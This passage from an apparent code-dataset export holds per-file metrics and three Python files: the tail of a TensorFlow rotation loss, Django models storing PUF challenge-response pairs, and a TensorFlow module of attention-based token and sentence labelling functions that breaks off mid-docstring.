prediction = classifier.get_output_for(images, is_training=True)
prediction = prediction[:, 0:2]
distance_real_rotations = tf.square(tf.norm(labels - prediction, axis=-1))
distance_real_rotations = autosummary('Loss/rotation_distance/real', distance_real_rotations)
regularization = tf.reduce_sum(tf.square(prediction), axis=-1) - tf.ones(4)
loss = distance_real_rotations
loss += regularization * reg_factor
return loss, labels, prediction
| 45.547771 | 154 | 0.744931 | 919 | 7,151 | 5.463547 | 0.075082 | 0.108743 | 0.121091 | 0.1191 | 0.962159 | 0.943438 | 0.943438 | 0.943438 | 0.943438 | 0.929894 | 0 | 0.011732 | 0.153685 | 7,151 | 156 | 155 | 45.839744 | 0.817911 | 0 | 0 | 0.784 | 0 | 0 | 0.07859 | 0.0702 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048 | false | 0 | 0.016 | 0 | 0.112 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4dcf34a607f06e4a11cb467287c317ee63a0190e | 711 | py | Python | kerberos/RegisterService/models.py | st12138/kerberos_puf | 6035c45f5b0d070879f221d101defb9cab1578b8 | [
"MIT"
] | null | null | null | kerberos/RegisterService/models.py | st12138/kerberos_puf | 6035c45f5b0d070879f221d101defb9cab1578b8 | [
"MIT"
] | null | null | null | kerberos/RegisterService/models.py | st12138/kerberos_puf | 6035c45f5b0d070879f221d101defb9cab1578b8 | [
"MIT"
] | null | null | null | from django.db import models
# Create your models here.
class CRPModels(models.Model):
device_id=models.CharField(max_length=64)
challenge=models.CharField(max_length=1024,primary_key=True)
response=models.CharField(max_length=257)
used_times=models.CharField(max_length=100)
update_time=models.CharField(max_length=100)
identity = models.CharField(max_length=10)
def __str__(self):
return self.device_id
class CRPTModels(models.Model):
device_id=models.CharField(max_length=64)
challenge=models.CharField(max_length=1024)
response=models.CharField(max_length=257)
used_times=models.CharField(max_length=100)
update_time=models.CharField(max_length=100) | 37.421053 | 64 | 0.776371 | 99 | 711 | 5.343434 | 0.363636 | 0.311909 | 0.374291 | 0.499055 | 0.718336 | 0.718336 | 0.718336 | 0.718336 | 0.718336 | 0.718336 | 0 | 0.051282 | 0.122363 | 711 | 19 | 65 | 37.421053 | 0.796474 | 0.033755 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0.0625 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
4ddaf0056e85ee80c2479c1c203d0b665ae6f44b | 103,822 | py | Python | modules.py | MirunaPislar/multi-head-attention-labeller | d1628fa89279fd3bf7244005be344f396e2c0e7f | [
"Apache-2.0"
] | 12 | 2019-06-06T18:19:24.000Z | 2021-09-13T08:37:19.000Z | modules.py | MirunaPislar/multi-head-attention-labeller | d1628fa89279fd3bf7244005be344f396e2c0e7f | [
"Apache-2.0"
] | null | null | null | modules.py | MirunaPislar/multi-head-attention-labeller | d1628fa89279fd3bf7244005be344f396e2c0e7f | [
"Apache-2.0"
] | 1 | 2019-08-28T07:04:52.000Z | 2019-08-28T07:04:52.000Z | from math import ceil
import tensorflow as tf
def layer_normalization(layer, epsilon=1e-8):
"""
Implements layer normalization.
:param layer: has 2-dimensional, the first dimension is the batch_size
:param epsilon: a small number to avoid numerical issues, such as zero division.
:return: normalized tensor, of the same shape as the input
"""
with tf.variable_scope("layer_norm"):
params_shape = layer.get_shape()[-1:]
mean, variance = tf.nn.moments(layer, [-1], keep_dims=True)
beta = tf.get_variable(
name="beta", shape=params_shape, initializer=tf.zeros_initializer(), trainable=True)
gamma = tf.get_variable(
name="gamma", shape=params_shape, initializer=tf.ones_initializer(), trainable=True)
normalized = (layer - mean) / ((variance + epsilon) ** 0.5)
outputs = gamma * normalized + beta
return outputs
def division_masking(inputs, axis, multiplies):
"""
Masking used when dividing one element by the sum on a certain axis.
Division by 0 is not possible -- all values will be -infinity, instead.
:param inputs: the input needed to be divided
:param axis: axis on which to perform the reduced sum
:param multiplies: the shape to be used when tiling the division masks.
:return: the correct normalized inputs (with -infinity for divisions by 0).
"""
division_masks = tf.sign(tf.reduce_sum(inputs, axis=axis, keep_dims=True))
division_masks = tf.tile(division_masks, multiples=multiplies)
divided_inputs = tf.where(
tf.equal(division_masks, 0),
tf.zeros_like(inputs),
# tf.ones_like(inputs) * (-2 ** 32 + 1.0),
tf.div(inputs, tf.reduce_sum(inputs, axis=axis, keep_dims=True)))
return divided_inputs
def label_smoothing(labels, epsilon=0.1):
"""
Implements label smoothing. This prevents the model from becoming
over-confident about its predictions and thus, less prone to overfitting.
Label smoothing regularizes the model and makes it more adaptable.
:param labels: 3D tensor with the last dimension as the number of labels
:param epsilon: smoothing rate
:return: smoothed labels
"""
num_labels = labels.get_shape().as_list()[-1]
return ((1 - epsilon) * labels) + (epsilon / num_labels)
def mask(inputs, queries=None, keys=None, mask_type=None):
"""
Generates masks and apply them to 3D inputs.
inputs: 3D tensor. [B, M, M]
queries: 3D tensor. [B, M, E]
keys: 3D tensor. [B, M, E]
"""
padding_num = -2 ** 32 + 1
if "key" in mask_type:
masks = tf.sign(tf.reduce_sum(tf.abs(keys), axis=-1)) # [B, M]
masks = tf.expand_dims(masks, axis=1) # [B, 1, M]
masks = tf.tile(masks, [1, tf.shape(queries)[1], 1]) # [B, M, M]
paddings = tf.ones_like(inputs) * padding_num
outputs = tf.where(tf.equal(masks, 0), paddings, inputs) # [B, M, M]
elif "query" in mask_type:
masks = tf.sign(tf.reduce_sum(tf.abs(queries), axis=-1)) # [B, M]
masks = tf.expand_dims(masks, axis=-1) # [B, M, 1]
masks = tf.tile(masks, [1, 1, tf.shape(keys)[1]]) # [B, M, M]
outputs = inputs * masks
else:
raise ValueError("Unknown mask type: %s. You need to choose "
"between \"keys\" and \"query\"." % mask_type)
return outputs
def mask_2(inputs, queries=None, keys=None, mask_type=None):
"""
Generates masks and apply them to 4D inputs.
inputs: 3D tensor. [H, B, M, M]
queries: 3D tensor. [H, B, M, E]
keys: 3D tensor. [H, B, M, E]
"""
padding_num = -2 ** 32 + 1
if "key" in mask_type:
masks = tf.sign(tf.reduce_sum(tf.abs(keys), axis=-1)) # [H, B, M]
masks = tf.expand_dims(masks, axis=2) # [H, B, 1, M]
masks = tf.tile(masks, [1, 1, tf.shape(queries)[2], 1]) # [H, B, M, M]
paddings = tf.ones_like(inputs) * padding_num
outputs = tf.where(tf.equal(masks, 0), paddings, inputs) # [H, B, M, M]
elif "query" in mask_type:
masks = tf.sign(tf.reduce_sum(tf.abs(queries), axis=-1)) # [H, B, M]
masks = tf.expand_dims(masks, axis=-1) # [H, B, M, 1]
masks = tf.tile(masks, [1, 1, 1, tf.shape(keys)[2]]) # [H, B, M, M]
outputs = inputs * masks
else:
raise ValueError("Unknown mask type: %s. You need to choose "
"between \"keys\" and \"query\"." % mask_type)
return outputs
def cosine_distance_loss(inputs, take_abs=False):
"""
Computes the cosine pairwise distance loss between the input heads.
:param inputs: expects tensor with its last two dimensions [*, H, E],
where H = num heads and E = arbitrary vector dimension.
:param take_abs: take the absolute value of the cosine similarity; this
has the effect of switching from [-1, 1] to [0, 1], with the minimum at 0,
i.e. when the vectors are orthogonal, which is what we want.
However, this might not be differentiable at 0.
:return: loss of the cosine distance between any 2 pairs of head vectors.
"""
with tf.variable_scope("cosine_distance_loss"):
# Calculate the cosine similarity and cosine distance.
# The goal is to maximize the cosine distance.
normalized_inputs = tf.nn.l2_normalize(inputs, axis=-1)
permutation = list(range(len(inputs.get_shape().as_list())))
permutation[-1], permutation[-2] = permutation[-2], permutation[-1]
cos_similarity = tf.matmul(
normalized_inputs, tf.transpose(normalized_inputs, permutation))
# Mask the lower diagonal matrix.
ones = tf.ones_like(cos_similarity)
mask_upper = tf.matrix_band_part(ones, 0, -1) # upper triangular part
mask_diagonal = tf.matrix_band_part(ones, 0, 0) # diagonal
mask_matrix = tf.cast(mask_upper - mask_diagonal, dtype=tf.bool)
upper_triangular_flat = tf.boolean_mask(cos_similarity, mask_matrix)
if take_abs:
return tf.reduce_mean(tf.math.abs(upper_triangular_flat))
else:
return tf.reduce_mean(upper_triangular_flat)
def single_head_attention_binary_labels(
inputs,
initializer,
attention_size,
sentence_lengths,
hidden_units):
"""
Computes single-head attention (just normal, vanilla, soft attention).
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_size: number of units to use for the attention evidence
:param sentence_lengths: 2D ints of shape [B, M]
:param hidden_units: number of units to use for the processed sent tensor
:return sentence_scores: result of the attention * input; floats of shape [B]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: result of the un-normalized attention weights; floats of shape [B, M]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
"""
with tf.variable_scope("single_head_attention_binary_labels"):
attention_evidence = tf.layers.dense(
inputs=inputs, units=attention_size,
activation=tf.tanh, kernel_initializer=initializer) # [B, M, attention_size]
attention_weights = tf.layers.dense(
inputs=attention_evidence, units=1,
kernel_initializer=initializer) # [B, M, 1]
attention_weights = tf.squeeze(attention_weights, axis=-1) # [B, M]
attention_weights = tf.sigmoid(attention_weights)
token_scores = attention_weights
token_predictions = tf.where(
tf.greater_equal(token_scores, 0.5),
tf.ones_like(token_scores),
tf.zeros_like(token_scores))
token_predictions = tf.cast(tf.where(
tf.sequence_mask(sentence_lengths),
token_predictions,
tf.zeros_like(token_predictions) - 1e6), tf.int32)
attention_weights = tf.where(
tf.sequence_mask(sentence_lengths),
attention_weights, tf.zeros_like(attention_weights))
attention_weights = attention_weights / tf.reduce_sum(
attention_weights, axis=1, keep_dims=True) # [B, M]
product = inputs * tf.expand_dims(attention_weights, axis=-1) # [B, M, E]
processed_tensor = tf.reduce_sum(product, axis=1) # [B, E]
if hidden_units > 0:
processed_tensor = tf.layers.dense(
inputs=processed_tensor, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B, hidden_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=1,
activation=tf.sigmoid, kernel_initializer=initializer,
name="output_sent_single_head_ff") # [B, 1]
sentence_scores = tf.reshape(
sentence_scores, shape=[tf.shape(processed_tensor)[0]]) # [B]
sentence_predictions = tf.where(
tf.greater_equal(sentence_scores, 0.5),
tf.ones_like(sentence_scores, dtype=tf.int32),
tf.zeros_like(sentence_scores, dtype=tf.int32)) # [B]
return sentence_scores, sentence_predictions, token_scores, token_predictions
def baseline_lstm_last_contexts(
last_token_contexts,
last_context,
initializer,
scoring_activation,
sentence_lengths,
hidden_units,
num_sentence_labels,
num_token_labels):
"""
Computes token and sentence scores/predictions solely from the last LSTM contexts.
vectors that the Bi-LSTM has produced. Works for flexible no. of labels.
:param last_token_contexts: the (concatenated) Bi-LSTM outputs per-token.
:param last_context: the (concatenated) Bi-LSTM final state.
:param initializer: type of initializer (best if Glorot or Xavier)
:param scoring_activation: used in computing the sentence scores from the token scores (per-head)
:param sentence_lengths: 2D ints of shape [B, M]
:param hidden_units: number of units to use for the processed sentence tensor
:param num_sentence_labels: number of unique sentence labels
:param num_token_labels: number of unique token labels
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_token_labels]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
:return: attention weights will be a tensor of zeros of shape [B, M, num_token_labels].
"""
with tf.variable_scope("baseline_lstm_last_contexts"):
if hidden_units > 0:
processed_tensor = tf.layers.dense(
last_context, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer)
token_scores = tf.layers.dense(
last_token_contexts, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer)
else:
processed_tensor = last_context
token_scores = last_token_contexts
sentence_scores = tf.layers.dense(
processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_scores_lstm_ff") # [B, num_sentence_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores, axis=-1)
sentence_predictions = tf.argmax(sentence_probabilities, axis=-1) # [B]
token_scores = tf.layers.dense(
token_scores, units=num_token_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="token_scores_lstm_ff") # [B, M, num_token_labels]
masked_sentence_lengths = tf.tile(
input=tf.expand_dims(
tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_token_labels])
token_scores = tf.where(
masked_sentence_lengths,
token_scores,
tf.zeros_like(token_scores)) # [B, M, num_token_labels]
token_probabilities = tf.nn.softmax(token_scores, axis=-1)
token_predictions = tf.argmax(token_probabilities, axis=-1)
attention_weights = tf.zeros_like(token_scores)
return sentence_scores, sentence_predictions, token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def single_head_attention_multiple_labels(
inputs,
initializer,
attention_activation,
attention_size,
sentence_lengths,
hidden_units,
num_sentence_labels,
num_token_labels):
"""
Computes single-head attention, but adapt it (naively) to make it work for multiple labels.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation: type of attention activation (soft, sharp, linear, etc)
:param attention_size: number of units to use for the attention evidence
:param sentence_lengths: 2D ints of shape [B, M]
:param hidden_units: number of units to use for the processed sent tensor
:param num_sentence_labels: number of unique sentence labels
:param num_token_labels: number of unique token labels
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_token_labels]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
"""
with tf.variable_scope("SHA_multiple_labels"):
attention_evidence = tf.layers.dense(
inputs=inputs, units=attention_size,
activation=tf.tanh, kernel_initializer=initializer) # [B, M, attention_size]
attention_evidence = tf.layers.dense(
inputs=attention_evidence, units=1,
kernel_initializer=initializer) # [B, M, 1]
attention_evidence = tf.squeeze(attention_evidence, axis=-1) # [B, M]
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence)
elif attention_activation == "linear":
attention_weights = attention_evidence
elif attention_activation == "softmax":
attention_weights = tf.nn.softmax(attention_evidence)
else:
raise ValueError("Unknown/unsupported activation for attention activation: %s."
% attention_activation)
# Mask attention weights.
attention_weights = tf.where(
tf.sequence_mask(sentence_lengths),
attention_weights, tf.zeros_like(attention_weights))
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
if attention_activation != "softmax":
attention_weights = attention_weights / tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True) # [B, M]
token_scores = tf.layers.dense(
inputs=tf.expand_dims(attention_weights_unnormalized, -1),
units=num_token_labels,
kernel_initializer=initializer,
name="output_single_head_token_scores_ff") # [B, M, num_token_labels]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(token_probabilities,
axis=2, output_type=tf.int32) # [B, M]
product = inputs * tf.expand_dims(attention_weights, axis=-1) # [B, M, E]
processed_tensor = tf.reduce_sum(product, axis=1) # [B, E]
if hidden_units > 0:
processed_tensor = tf.layers.dense(
inputs=processed_tensor, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B, hidden_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
kernel_initializer=initializer,
name="output_multi_sent_specified_scores_ff") # [B, num_unique_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores, axis=-1)
sentence_predictions = tf.argmax(sentence_probabilities, axis=-1) # [B]
return sentence_scores, sentence_predictions, token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def multi_head_attention_with_scores_from_shared_heads(
inputs,
initializer,
attention_activation,
hidden_units,
num_sentence_labels,
num_heads,
is_training,
dropout,
sentence_lengths,
use_residual_connection,
token_scoring_method):
"""
Computes multi-head attention (mainly inspired by the transformer architecture).
This method does not take into account any masking at any level.
All the masking will be performed before computing a primary/secondary loss.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation: type of attention activation (linear, softmax or sigmoid)
:param hidden_units: number of units to use for the processed sent tensor
:param num_sentence_labels: number of unique sentence labels
:param num_heads: number of unique token labels
:param is_training: if set to True, the current phase is a training one (rather than testing)
:param dropout: the keep_probs value for the dropout
:param sentence_lengths: the true sentence lengths, used for masking
:param use_residual_connection: if set to True, a residual connection is added to the inputs
:param token_scoring_method: can be either max, sum or avg
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_heads]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
:return token_probabilities: the token scores normalized across the axis
"""
with tf.variable_scope("MHA_sentence_scores_from_shared_heads"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
values = tf.where(multiplication_mask, values, tf.zeros_like(values))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
elif attention_activation == "softmax":
attention_weights = tf.nn.softmax(attention_evidence_masked)
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
if attention_activation != "softmax":
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask(
attention_weights_unnormalized, queries, keys, mask_type="query")
# Apply a dropout layer on the attention weights.
if dropout > 0.0:
dropout_attention = (dropout * tf.cast(is_training, tf.float32)
+ (1.0 - tf.cast(is_training, tf.float32)))
attention_weights = tf.nn.dropout(
attention_weights, dropout_attention,
name="dropout_attention_weights") # [B*num_heads, M, M]
# [B*num_heads, M, num_units/num_heads]
product = tf.matmul(attention_weights, values)
product = tf.concat(
tf.split(product, num_heads), axis=2) # [B, M, num_units]
# Add a residual connection, followed by layer normalization.
if use_residual_connection:
product += inputs
product = layer_normalization(product) # [B, M, num_units]
processed_tensor = tf.reduce_sum(product, axis=1) # [B, num_units]
if hidden_units > 0:
processed_tensor = tf.layers.dense(
inputs=processed_tensor, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B, hidden_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_unique_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Obtain token scores from the attention weights.
# The token scores will have shape [B*num_heads, M, 1].
if token_scoring_method == "sum":
token_scores = tf.expand_dims(tf.reduce_sum(
attention_weights_unnormalized, axis=1), axis=2)
elif token_scoring_method == "max":
token_scores = tf.expand_dims(tf.reduce_max(
attention_weights_unnormalized, axis=1), axis=2)
elif token_scoring_method == "avg":
token_scores = tf.expand_dims(tf.reduce_mean(
attention_weights_unnormalized, axis=1), axis=2)
elif token_scoring_method == "logsumexp":
token_scores = tf.expand_dims(tf.reduce_logsumexp(
attention_weights_unnormalized, axis=1), axis=2)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores = tf.concat(
tf.split(token_scores, num_heads), axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def multi_head_attention_with_scores_from_separate_heads(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
is_training,
dropout,
sentence_lengths,
normalize_sentence,
token_scoring_method,
scoring_activation=None,
separate_heads=True):
"""
Computes multi-head attention (mainly inspired by the transformer architecture).
This version of the implementation applies masking at several levels:
* first, the keys, queries and values so that the matrix multiplications
are performed only between meaningful positions
* second, the attention evidence values of 0 should be replaced with -infinity
so that when applying a non-linear layer, the resulted value is very close to 0.
* third, when obtaining the token probabilities (by normalizing across the scores),
division masking is performed (a value of 0 should be attributed to all 0 sums).
The masking performed before computing a primary/secondary loss is preserved.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation: type of attention activation (linear, softmax or sigmoid)
:param num_sentence_labels: number of unique sentence labels
:param num_heads: number of unique token labels
:param is_training: if set to True, the current phase is a training one (rather than testing)
:param dropout: the keep_probs value for the dropout
:param sentence_lengths: the true sentence lengths, used for masking
:param normalize_sentence: if set to True, the last weighted sentence layer is normalized
:param token_scoring_method: can be either max, sum or avg
:param scoring_activation: used in computing the sentence scores from the token scores (per-head)
:param separate_heads: boolean value; when set to False, all heads
are used to obtain the sentence scores; when set to True, the default and non-default heads
from the token scores are used to obtain the sentence scores.
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_heads]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
"""
with tf.variable_scope("MHA_sentence_scores_from_separate_heads"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
values = tf.where(multiplication_mask, values, tf.zeros_like(values))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
elif attention_activation == "softmax":
attention_weights = tf.nn.softmax(attention_evidence_masked)
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
# Normalize attention weights.
if attention_activation != "softmax":
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
# Apply a dropout layer on the attention weights.
if dropout > 0.0:
dropout_attention = (dropout * tf.cast(is_training, tf.float32)
+ (1.0 - tf.cast(is_training, tf.float32)))
attention_weights = tf.nn.dropout(
attention_weights, dropout_attention,
name="dropout_attention_weights") # [B*num_heads, M, M]
# Obtain the token scores from the attention weights.
# The token_scores below will have shape [B*num_heads, 1, M].
if token_scoring_method == "sum":
token_scores = tf.reduce_sum(
attention_weights, axis=1, keep_dims=True)
elif token_scoring_method == "max":
token_scores = tf.reduce_max(
attention_weights, axis=1, keep_dims=True)
elif token_scoring_method == "avg":
token_scores = tf.reduce_mean(
attention_weights, axis=1, keep_dims=True)
elif token_scoring_method == "logsumexp":
token_scores = tf.reduce_logsumexp(
attention_weights, axis=1, keep_dims=True)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores = tf.concat(
tf.split(token_scores, num_heads),
axis=1) # [B, num_heads, M]
token_scores_normalized = division_masking(
inputs=token_scores, axis=-1,
multiplies=[1, 1, tf.shape(token_scores)[-1]]) # [B, num_heads, M]
token_probabilities = tf.nn.softmax(token_scores, axis=1)
token_predictions = tf.argmax(
token_probabilities, axis=1, output_type=tf.int32) # [B, M]
# Obtain a weighted sum between the inputs and the attention weights.
# [B, num_heads, num_units]
weighted_sum_representation = tf.matmul(token_scores_normalized, values)
if normalize_sentence:
weighted_sum_representation = layer_normalization(weighted_sum_representation)
if separate_heads:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
weighted_sum_representation,
indices=[0], axis=1) # [B, 1, num_units]
# Get the sentence representations corresponding to the default head.
non_default_heads = tf.gather(
weighted_sum_representation,
indices=list(range(1, num_heads)), axis=1) # [B, num_heads-1, num_units]
# Project onto one unit, corresponding to
# the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1, 1]
sentence_default_scores = tf.squeeze(
sentence_default_scores, axis=-1) # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels-1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_heads-1, num_sentence_labels-1]
sentence_non_default_scores = tf.reduce_mean(
sentence_non_default_scores, axis=1) # [B, num_sent_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
processed_tensor = tf.layers.dense(
inputs=weighted_sum_representation, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_scores_ff") # [B, num_heads, num_unique_sent_labels]
sentence_scores = tf.reduce_sum(
processed_tensor, axis=1) # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Get token scores and probabilities of shape # [B, M, num_heads].
token_scores = tf.transpose(token_scores, [0, 2, 1])
token_probabilities = tf.transpose(token_probabilities, [0, 2, 1])
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def compute_scores_from_additive_attention(
inputs,
initializer,
attention_activation,
sentence_lengths,
attention_size=50,
hidden_units=50):
"""
Computes token and sentence scores from a single-head additive attention mechanism.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation: type of attention activation (linear, softmax or sigmoid)
:param sentence_lengths: 2D ints of shape [B, M]
:param attention_size: number of units to use for the attention evidence
:param hidden_units: number of units to use for the processed sent tensor
:return sentence_scores: result of the attention * input; floats of shape [B]
:return token_scores: result of the un-normalized attention weights; floats of shape [B, M]
